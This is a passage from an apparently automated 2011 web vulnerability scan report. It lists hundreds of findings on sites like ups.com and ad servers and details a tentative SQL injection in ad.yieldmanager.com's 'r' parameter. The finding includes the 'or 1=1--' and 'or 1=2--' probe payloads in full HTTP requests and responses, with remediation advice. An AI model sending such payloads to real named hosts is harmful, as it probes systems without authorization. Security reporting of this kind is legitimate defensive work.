3.637. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

3.638. https://www.ups.com/qvadmin/admin [loc parameter]

3.639. https://www.ups.com/qvadmin/admin [loc parameter]

3.640. https://www.ups.com/qvadmin/admin [loc parameter]

3.641. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

3.642. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

3.643. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

3.644. https://www.ups.com/sharp/prefapp [loc parameter]

3.645. https://www.ups.com/sharp/prefapp [loc parameter]

3.646. https://www.ups.com/sharp/prefapp [loc parameter]

3.647. https://www.ups.com/uis/create [REST URL parameter 1]

3.648. https://www.ups.com/uis/create [REST URL parameter 1]

3.649. https://www.ups.com/uis/create [REST URL parameter 1]

3.650. https://www.ups.com/uis/create [REST URL parameter 2]

3.651. https://www.ups.com/uis/create [REST URL parameter 2]

3.652. https://www.ups.com/uis/create [REST URL parameter 2]

3.653. https://www.ups.com/uis/create [loc parameter]

3.654. https://www.ups.com/uis/create [loc parameter]

3.655. https://www.ups.com/uis/create [loc parameter]

3.656. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

3.657. http://www.webbyawards.com/webbys/current_honorees.php [season parameter]

3.658. http://www.wikia.com/index.php [actionName parameter]

3.659. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.660. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

3.661. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

3.662. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

3.663. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

3.664. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.665. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

3.666. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

3.667. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

3.668. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

3.669. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

3.670. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie]

3.671. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie]

3.672. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

3.673. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie]

3.674. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie]

3.675. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

3.676. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

3.677. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

3.678. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [ZEDOIDA cookie]

3.679. http://ib.adnxs.com/acb [acb816623 cookie]

3.680. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [cli cookie]

3.681. http://optimized-by.rubiconproject.com/a/4275/4801/21897-2.js [ruid cookie]

3.682. http://optimized-by.rubiconproject.com/a/4275/4801/6720-15.js [ruid cookie]

3.683. http://optimized-by.rubiconproject.com/a/6005/12414/22164-18.js [ruid cookie]

3.684. http://optimized-by.rubiconproject.com/a/6005/12414/23428-15.js [ruid cookie]

3.685. http://optimized-by.rubiconproject.com/a/6005/12414/24980-9.js [ruid cookie]

3.686. http://optimized-by.rubiconproject.com/a/6005/12414/24981-15.js [ruid cookie]

3.687. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]

3.688. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3.689. http://tag.admeld.com/ad/iframe/216/us/728x90/news [meld_sess cookie]

3.690. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

3.691. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]



1. SQL injection  next
There are 26 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.yieldmanager.com/imp [r parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The r parameter appears to be vulnerable to SQL injection attacks. The payloads 14513687%20or%201%3d1--%20 and 14513687%20or%201%3d2--%20 were each submitted in the r parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /imp?Z=728x90&s=967562&_salt=946042951&B=10&r=014513687%20or%201%3d1--%20 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/216/us/728x90/news?t=1297647385452&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; liday1=d`rYgq=h3gG298^!8dq8oBRGc; ih="b!!!!S!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/j'@!!!!#<n!,f!/j'C!!!!#<miSV!/j'D!!!!#<myyF!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^%!!!!#<miS(!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0ER1!!!!#<miT1!0LZy!!!!#<m,_`!0L[!!!!!$<mk>*!0L[#!!!!'<n!/j"; vuday1=wqsoTt+ars!8dq8^RDK#; pv1="b!!!!@!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~!#mP:!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mP>!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPA!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPD!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPG!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPJ!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!!iIx!-nK4!$Uo!!0ER1!%G-L!!!!$!?5%!%R8]5!ZZ<)!'%'p!'MyD~~~~~~<miT1~M.jTN!#p!r!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n!Ey!!.vL!#p!u!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n!Ey!!.vL"; lifb=ck5e5rukLFjg_W2; bh="b!!!%1!!$ha!!?fS<mZsO!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!%<m#np!!,D(!!!!'<m#np!!-?2!!!!*<m#np!!-G2!!!!$<lise!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!)<m#np!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!'<mjPP!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!(<m#np!!2)5!!!!#<m#np!!4<u!!!!)<m#np!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!7gK!!!!#<lm]6!!<@x!!!!%<lSWC!!<P5!!!!#<m#np!!<P6!!!!#<m#np!!?VS!!DPb<lQiA!!C5(!!!!#<m#np!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L(^!!!!'<m8qE!!L_w!!!!+<m8qE!!MZU!!!!#<lQiC!!MfS!!!!$<mj`y!!Mr(!!ErC<k0fB!!ObA!!!!$<m#np!!ObV!!!!$<m#np!!OgU!!!!(<m#np!!T[J!!!!$<lm]6!!Z-E!!!!$<m#np!!Z-G!!!!$<m#np!!Z-L!!!!$<m#np!!Zw`!!!!%<m#np!!Zwb!!!!'<m#np!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!g[x!!!!#<m#np!!hqJ!!!!#<lP]!!!iEC!!!!'<m#np!!iEb!!!!)<m#np!!i_9!!!!$<m#np!!jD6!!!!#<lja'!!mDJ!!!!#<lQq8!!p.C!!!!$<n!1B!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!$<lmXb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ti>!!!!#<m!S_!!u[u!!!!(<lVbU!!utd!!!!(<lVbU!!utl!!!!#<lSD*!!uto!!!!#<lVbU!!uu)!!!!%<lSVZ!!v:e!!!!(<m#np!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!#!vF!!!!#<m*gT!#!vL!!!!#<m*gT!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#')-!!!!#<k2yx!#*<R!!!!%<ln'v!#*VS!!!!#<jLPe!#+]S!!!!(<m#np!#,##!!!!'<lSWC!#-vv!!!!$<iC/K!#.dO!!!!+<m8qE!#/:a!!!!$<lmXf!#/G2!!!!$<m#np!#/G<!!!!$<m#np!#/GO!!!!$<m#np!#/j>!!!!#<m*gT!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!?fS<mZsO!#2+>!!!!'<lS0M!#2Ic!!!!$<mj`x!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3(M!!!!#<m*gT!#3>,!!!!#<lmWu!#3>9!!!!#<lxx`!#3>C!!!!#<lxx]!#3>M!!!!#<lmdr!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(U!!!!#<myyA!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#6Ty!!!!#<myyA!#7(x!!!!*<m#np!#8*^!!!!#<mC=k!#8.'!!!!$<lmXe!#8:i!!!!#<jc#c!#8?7!!!!$<lmXb!#8A2!!!!#<k11E!#<T3!!!!#<jbNC!#@7F!!!!#<m8qE!#@wb!!!!#<m*gT!#CC>!!!!#<lS@,!#F1H!!!!'<lS0M!#FGA!!!!%<ln'v!#Fu6!!!!$<lm]6!#Fw_!!!!%<ln'v!#I=D!!!!,<m915!#Ic1!!!!$<lmXc!#Ie+!!!!#<myyA!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!$<mjPP!#LI0!!!!#<k2yw!#LaM!!!!#<m,_i!#MAX!!!!#<mjra!#MTC!!!!-<m9Vb!#MTF!!!!-<m9Vb!#MTH!!!!-<m9Vb!#MTI!!!!-<m9Vb!#MTJ!!!!-<m9Vb!#Mub!!!!#<myyA!#NjS!!!!#<lI#*!#O4F!!!!#<m*gT!#O4I!!!!#<m*gT!#O4M!!!!#<m*gT!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#OH-!!!!#<m*gT!#PqQ!!!!#<lI#)!#PrV!!!!$<myyF!#Q*7!!!!#<n!1O!#Q+o!!!!+<m8qE!#Q<o!!!!#<mC=k!#Qh8!!!!#<l.yn!#R!r!!!!#<myyA!#RSx!!!!#<m*gT!#Ri/!!!!+<m8qE!#Rij!!!!+<m8qE!#SCj!!!!%<m*l:!#SCk!!!!(<m8qG!#SUp!!!!(<m#np!#SVp!!!!#<m*gT!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!$<lmXe!#TnE!!!!*<m9Vb!#Tnp!!!!$<lmXb!#UDQ!!!!-<m9Vb!#UJ4!!!!#<m*gT!#UJ9!!!!#<m*gT!#UL(!!!!%<lQW%!#V7#!!!!#<myyA!#VYG!!!!(<mCr1!#V]o!!!!%<mCr1!#V]u!!!!'<mCr1!#V]v!!!!'<mCr1!#W,W!!!!'<mCr1!#W-B!!!!%<mCr1!#W-^!!!!%<mCr1!#W.*!!!!'<mCr1!#W.B!!!!#<m*XR!#W.Q!!!!'<mCr1!#W/5!!!!'<mCr1!#W/A!!!!'<mCr1!#W/J!!!!$<m:Vy!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X:Z!!!!#<m*gT!#X]+!!!!'<kdT!!#Zb%!!!!#<m#np!#ZbF!!!!#<m#np!#ZbM!!!!#<m#np!#ZhT!!!!*<m#np!#Zmf!!!!$<kT`F!#[25!!!!%<lhqW!#[L>!!!!%<lise!#]%`!!!!$<m*Yw!#]Z#!!!!#<m#np!#^$?!!!!#<m*gT!#^0$!!!!(<m#np!#^0%!!!!(<m#np!#^d6!!!!$<m*Yw!#_+6!!!!#<m*gT!#_0t!!!!%<kTb(!#_1L!!!!#<m*gT!#`T=!!!!#<m#np!#`T>!!!!#<m#np!#`TF!!!!#<m#np!#`TG!!!!#<m#np!#`TJ!!!!#<m#np!#`TK!!!!#<m#np!#aCq!!!!'<lisd!#aG>!!!!+<m8qE!#aM'!!!!#<kp_p!#aly!!!!#<m*gT!#av4!!!!$<m!TH!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b?A!!!!#<l.x@!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#cC!!!!!#<ie2`!#dCU!!!!#<m*gT!#e)`!!!!#<m:W!!#e@W!!!!#<k_2)!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f$g!!!!%<mh@e!#fBj!!!!)<m#np!#fBk!!!!)<m#np!#fBm!!!!)<m#np!#fBn!!!!)<m#np!#fE=!!!!'<lQj,!#fG+!!!!)<m#np!#fJ/!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g/7!!!!(<m#np!#gC:!!!!#<lmdV!#gHO!!!!#<m*gT!#gPp!!!!#<m!TX!#gRx!!!!#<htU3!#g]5!!!!#<lm]?!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#gq`!!!!#<m*gT!#h.N!!!!#<kL2n!#jRq!!!!#<mZv)!#jS>!!!!#<k_Jy!#mP5!!!!$<lise!#mP6!!!!$<lise!#ndJ~~!#ndP!!!!$<lP]'!#ne$!!!!$<lP]'!#p7'!!!!#<myyA!#p9d!!!!#<lj09!#pD8!!!!+<n!/j!#q?L!!!!#<mjrb!#rJ)!!!!#<mn#6!#sXy!!!!#<n!/o!#so_!!!!#<mjPP!#sx#!!!!3<m9Vd!#t?S!!!!#<m`73"

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 15:04:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: ad0106.rm.ac4
Set-Cookie: ih="b!!!!T!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*fR,!!!!#<n)p(!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/j'@!!!!#<n!,f!/j'C!!!!#<miSV!/j'D!!!!#<myyF!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^%!!!!#<miS(!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0ER1!!!!#<miT1!0LZy!!!!#<m,_`!0L[!!!!!$<mk>*!0L[#!!!!'<n!/j"; path=/; expires=Wed, 13-Feb-2013 15:04:16 GMT
Set-Cookie: vuday1=wqsoT.Sexft+ars!8dq8D:gog; path=/; expires=Tue, 15-Feb-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 15:04:16 GMT
Pragma: no-cache
Content-Length: 1099
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://adserving.cpxinteractive.com/clk?2,13%3Bfa3c674836a73c45%3B12e24b3572e,0%3B%3B%3B11717859,INNLAIrDDgBD0kgAAAAAAASeEwAAAAAAAgAAAAYAAAAAAP8AAAACCvNjGwAAAAAAxLkaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWRAgAAAAAAAIAAgAAAAAAPFWzJC4BAAAAAAAAAGIwYjJlOTk4LTM4NGItMTFlMC04YWQ4LTAwMWIyNDkzNjNmMgBwAAAAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F216%2Fus%2F728x90%2Fnews%3Ft%3D1297647385452%26tz%3D360%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.independent.co.uk%252fnews%252fworld%252fafrica%252fis-the-army-tightening-its-grip-on-egypt-2213849.html%26refer%3D,\"><img border=\"0\" alt=\"\" height=\"90\" width=\"728\" src=\"http://content.yieldmanager.edgesuite.net/atoms/5a/cc/9e/e6/5acc9ee606bbd324e3c86a2c1abbeb2c.gif\"></img></
...[SNIP]...

Request 2

GET /imp?Z=728x90&s=967562&_salt=946042951&B=10&r=014513687%20or%201%3d2--%20 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/216/us/728x90/news?t=1297647385452&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; liday1=d`rYgq=h3gG298^!8dq8oBRGc; ih="b!!!!S!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/j'@!!!!#<n!,f!/j'C!!!!#<miSV!/j'D!!!!#<myyF!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^%!!!!#<miS(!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0ER1!!!!#<miT1!0LZy!!!!#<m,_`!0L[!!!!!$<mk>*!0L[#!!!!'<n!/j"; vuday1=wqsoTt+ars!8dq8^RDK#; pv1="b!!!!@!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~!#mP:!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mP>!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!#mPA!-I0R!$Khv!0L[#!%Bbn~!#W(2)HM3<!wVd.!%l4g!!j:k!'H85~~~~~<n!/j<n<(e!!!#G!